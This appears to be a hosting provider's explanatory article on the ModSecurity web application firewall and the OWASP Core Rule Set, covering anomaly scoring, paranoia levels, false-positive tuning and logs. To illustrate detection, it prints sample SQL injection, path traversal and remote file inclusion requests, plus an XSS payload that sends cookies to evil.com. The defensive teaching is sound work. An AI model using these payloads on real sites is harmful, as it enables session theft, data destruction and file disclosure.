ModSecurity is a web application firewall (WAF) that inspects HTTP requests before they reach your application. It sits between the web server (Nginx or Apache) and your website, analyzing every incoming request against a set of rules. Requests that match known attack patterns – SQL injection, cross-site scripting, path traversal, remote file inclusion – are blocked before your application ever sees them.
A traditional firewall controls access at the network level: which IPs can connect, which ports are open. A WAF operates at the application level. It reads the actual content of HTTP requests – URL parameters, POST bodies, cookies, headers – and decides whether the request looks legitimate or malicious. This distinction matters because most attacks against web applications are syntactically valid HTTP requests. They arrive on port 443 like any other HTTPS request. A network firewall sees nothing wrong with them. A WAF reads the payload and recognizes the attack.
How ModSecurity works#
ModSecurity processes each request through a pipeline of phases:
- Request headers – ModSecurity reads the URL, query parameters, cookies, and HTTP headers
- Request body – ModSecurity reads the POST body (form data, JSON, file uploads)
- Response headers – ModSecurity checks the outgoing response headers
- Response body – ModSecurity checks the outgoing response content
- Logging – ModSecurity logs the transaction and any rule matches
At each phase, the request is evaluated against a set of rules. If a rule matches, ModSecurity takes the configured action: block the request (return a 403), log it and allow, redirect, or drop the connection.
Rule matching
Each rule has three parts: a variable to inspect, an operator to apply, and an action to take.
A simplified example:
SecRule ARGS "@contains ../../../" "id:1001,phase:1,deny,status:403,msg:'Path traversal attempt'"
This rule says: inspect all query parameters and POST arguments. If any of them contain
../../../
, deny the request with a 403 status and log the message “Path traversal attempt.”
In practice, the rules are more sophisticated. They use regular expressions, chain multiple conditions, and assign anomaly scores rather than blocking on a single match. But the concept is the same: pattern matching against the content of HTTP requests.
The OWASP Core Rule Set#
ModSecurity is the engine. The rules that power it are a separate component. The most widely used rule set is the OWASP Core Rule Set (CRS), maintained by the Open Web Application Security Project.
The CRS provides rules for:
SQL injection
Detects attempts to inject SQL commands through input fields, URL parameters, and cookies.
GET /page?id=1' OR '1'='1
GET /page?id=1; DROP TABLE users--
POST /search body: query='; DELETE FROM wp_posts WHERE 1=1--
SQL injection is one of the oldest and most common web attacks. An unprotected WordPress plugin that builds database queries from user input without proper sanitization is vulnerable. ModSecurity catches these patterns in the request before the query ever reaches the database.
Cross-site scripting (XSS)
Detects script injection in user input:
POST /comment body: content=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
GET /search?q=<img src=x onerror=alert(1)>
XSS attacks embed JavaScript in content that other users view. If a WordPress plugin renders user input without escaping it, an attacker can inject scripts that steal session cookies, redirect visitors, or modify page content. ModSecurity blocks requests containing script tags, event handlers, and other XSS vectors.
Path traversal
Detects attempts to access files outside the web root:
GET /page?file=../../../../etc/passwd
GET /download?path=../../../wp-config.php
Path traversal attacks exploit plugins or themes that include files based on user input without validating the path. The attacker walks up the directory tree using
../
sequences to reach sensitive files like
/etc/passwd
or
wp-config.php
.
Remote file inclusion
Detects attempts to include files from external URLs:
GET /page?template=http://evil.com/malware.php
If a plugin uses
include()
or
require()
with a user-supplied path and
allow_url_include
is enabled in PHP, an attacker can load and execute their own PHP code on your server. ModSecurity blocks requests that contain URLs where filenames are expected.
Protocol violations
Detects HTTP requests that violate the protocol specification: malformed headers, missing required headers, invalid encoding, request smuggling attempts. These are not application-specific attacks but are commonly used by scanners and automated attack tools.
Scanner detection
Detects requests from known vulnerability scanners (Nikto, SQLMap, WPScan) by matching their user agent strings, request patterns, and behavioral signatures.
Anomaly scoring#
The OWASP CRS does not block requests on a single rule match by default. It uses an anomaly scoring system where each rule match adds points to a request’s score. The request is blocked only when the total score exceeds a threshold.
For example:
- A request with a single suspicious character in a parameter might score 5 points
- A request with a clear SQL injection pattern scores 15 points
- A request that matches both a SQL injection and a protocol violation scores 20 points
The default threshold is 5 for incoming requests. A score of 5 or higher triggers a block. This threshold is configurable and is the primary way to tune the balance between security and false positives.
Lower thresholds are stricter (block more aggressively, more false positives). Higher thresholds are more permissive (block less, fewer false positives but some attacks may slip through).
Paranoia levels#
The OWASP CRS has four paranoia levels that control how many rules are active:
| Level | What it enables | Use case |
|---|---|---|
| PL1 | Core rules with minimal false positives | Default. Suitable for most sites. |
| PL2 | Additional rules that may cause some false positives | Sites that need tighter security and can handle tuning. |
| PL3 | Rules that match broader patterns. Higher false positive rate. | High-security environments with dedicated staff to manage exceptions. |
| PL4 | Maximum detection. Many false positives expected. | Testing and development. Not practical for production without extensive tuning. |
Most production sites run at PL1 or PL2. Higher levels require more time spent on exception tuning because legitimate requests start triggering rules.
ModSecurity vs Wordfence#
Wordfence is a WordPress security plugin that includes its own WAF. ModSecurity is a server-level WAF. They operate at different layers:
| ModSecurity | Wordfence WAF | |
|---|---|---|
| Where it runs | Web server level (before PHP) | Inside WordPress (PHP plugin) |
| What it protects | Any web application on the server | Only the WordPress installation it is installed on |
| Resource cost | Minimal – request is blocked before PHP starts | Each request loads WordPress core before the WAF can evaluate it |
| Rule source | OWASP CRS (community-maintained, vendor-neutral) | Wordfence’s proprietary rule set |
| Configuration | Server admin manages rules | WordPress admin manages via dashboard |
| Scope | Protects against attacks that target any web application | Protects against WordPress-specific attacks |
The key difference is the execution point. ModSecurity blocks a malicious request at the web server. The request never reaches PHP. Wordfence’s WAF loads inside WordPress, which means PHP starts, WordPress core initializes, the database connects, and then Wordfence evaluates the request. If the request is malicious, all those resources were consumed before the WAF even looked at it.
This does not mean Wordfence is useless. Wordfence has WordPress-specific intelligence that ModSecurity does not: it knows about WordPress authentication, plugin vulnerabilities, and WordPress-specific attack patterns. ModSecurity works from generic web application rules.
The strongest setup is both. ModSecurity blocks the obvious attacks (SQL injection, XSS, path traversal) before PHP starts. Wordfence catches WordPress-specific threats that generic rules miss. See Wordfence and server-level security: why you need both for a detailed breakdown of how the two layers complement each other.
ModSecurity vs fail2ban#
fail2ban and ModSecurity solve different problems.
fail2ban monitors log files and bans IPs after repeated failures. It is reactive – the attacks reach your server, generate log entries, and then fail2ban responds. It is effective against brute force attacks (SSH, WordPress login) where the pattern is repeated failures from the same IP.
ModSecurity inspects the content of each individual request and blocks it in real time. A single request containing a SQL injection attempt is blocked immediately, on the first try, without needing to see a pattern of failures.
They complement each other. ModSecurity blocks attacks based on request content. fail2ban blocks attackers based on behavioral patterns across multiple requests.
False positives#
The most common operational challenge with ModSecurity is false positives – legitimate requests that trigger rules.
Common false positive scenarios
WordPress plugins with unusual POST data. Some plugins send complex data structures, serialized PHP objects, or base64-encoded content in POST requests. ModSecurity rules designed to detect obfuscated attack payloads can flag these as suspicious.
Page builders. Visual page builders (Elementor, WPBakery, Divi) save page content as large POST requests containing HTML, CSS, and sometimes JavaScript. ModSecurity’s XSS rules may flag the HTML content as a script injection attempt.
WooCommerce checkout. Payment gateway integrations sometimes include special characters in POST data that trigger SQL injection rules.
File uploads. Uploading PHP files (even legitimate ones like plugin ZIPs) can trigger file upload rules.
Admin operations. WordPress admin actions that modify content (editing posts, updating options, installing plugins) often contain characters and patterns that match attack signatures.
Handling false positives
The general approach:
- Check the ModSecurity audit log to identify which rule was triggered
- Verify it is actually a false positive – make sure the blocked request is genuinely legitimate
- Create a rule exclusion for that specific case
A rule exclusion tells ModSecurity to skip a specific rule for a specific URL, parameter, or condition:
SecRule REQUEST_URI "@beginsWith /wp-admin/post.php" "id:1000,phase:1,nolog,pass,ctl:ruleRemoveById=942100"
This disables rule 942100 (a SQL injection rule) when the request URL is
/wp-admin/post.php
. The rule still applies everywhere else.
More targeted exclusions remove the rule for a specific parameter:
SecRule REQUEST_URI "@beginsWith /wp-admin/post.php" "id:1001,phase:1,nolog,pass,ctl:ruleRemoveTargetById=942100;ARGS:content"
This disables rule 942100 only for the
content
parameter on the post editor, keeping the rule active for all other parameters.
Best practice for exclusions
- Be as specific as possible. Exclude by URL and parameter, not globally.
- Document why each exclusion exists.
- Review exclusions periodically. Plugin updates may fix the behavior that required the exclusion.
- Never disable entire rule groups to fix a single false positive.
Logging and debugging#
The audit log
ModSecurity writes detailed logs of blocked requests. On most systems, the audit log is at:
/var/log/modsec_audit.log
Or:
/var/log/apache2/modsec_audit.log
/var/log/nginx/modsec_audit.log
Each entry includes the full request (URL, headers, body), which rules matched, the anomaly score, and the action taken. This is the primary tool for diagnosing false positives and understanding what ModSecurity is blocking.
Finding why a request was blocked
When a user reports a 403 error, check the audit log for the timestamp:
grep "403" /var/log/modsec_audit.log | grep "2026-03-20"
Or search for the user’s IP:
grep "198.51.100.20" /var/log/modsec_audit.log
The log entry shows which rules triggered and why. The rule ID (e.g., 942100) tells you what category the detection belongs to. OWASP CRS rule IDs follow a numbering scheme:
| Range | Category |
|---|---|
| 911xxx | Protocol enforcement |
| 913xxx | Scanner detection |
| 920xxx | Protocol violations |
| 921xxx | HTTP request smuggling |
| 930xxx | Local file inclusion |
| 931xxx | Remote file inclusion |
| 932xxx | Remote code execution |
| 933xxx | PHP injection |
| 941xxx | Cross-site scripting |
| 942xxx | SQL injection |
| 943xxx | Session fixation |
| 944xxx | Java attacks |
Testing rules
To test whether a specific rule triggers on a request without actually blocking:
SecRuleEngine DetectionOnly
This puts ModSecurity in detection-only mode. All rules are evaluated and logged, but no requests are blocked. Useful for testing new rules or tuning false positives without affecting users.
Switch back to blocking mode after testing:
SecRuleEngine On
ModSecurity with WordPress#
WordPress sites benefit significantly from ModSecurity because the WordPress ecosystem has a large attack surface. Thousands of plugins, many with known vulnerabilities, create entry points that attackers target with automated tools.
ModSecurity with the OWASP CRS blocks the most common attack types automatically:
- SQL injection through vulnerable plugin parameters
- XSS through unescaped form inputs
- File inclusion through improperly validated file paths
- PHP code injection through deserialization flaws
This does not replace keeping WordPress and plugins updated. ModSecurity blocks known attack patterns, but a sufficiently novel attack using a zero-day vulnerability may not match any existing rule. The WAF buys you time between the vulnerability disclosure and the patch release, but it is not a substitute for patching.
ModSecurity on Hostney#
On Hostney, ModSecurity with the OWASP Core Rule Set runs on all servers as part of the infrastructure. Every account gets WAF protection without installing anything or managing rules.
The ModSecurity configuration is managed at the platform level with tuning for common WordPress and WooCommerce patterns. Known false positives from popular plugins are pre-configured as exclusions so you do not have to deal with them.
ModSecurity settings and logs are available through the Firewall section in the control panel. If a legitimate request is being blocked, the logs show which rule triggered, and the support team can add specific exclusions.
This works alongside Hostney’s bot detection system and container isolation to provide multiple layers of protection:
- Bot detection identifies and blocks malicious traffic based on behavioral signals before the request reaches ModSecurity
- ModSecurity inspects request content and blocks attacks that match known patterns
- Container isolation ensures that even if an attack succeeds, it cannot affect other accounts on the server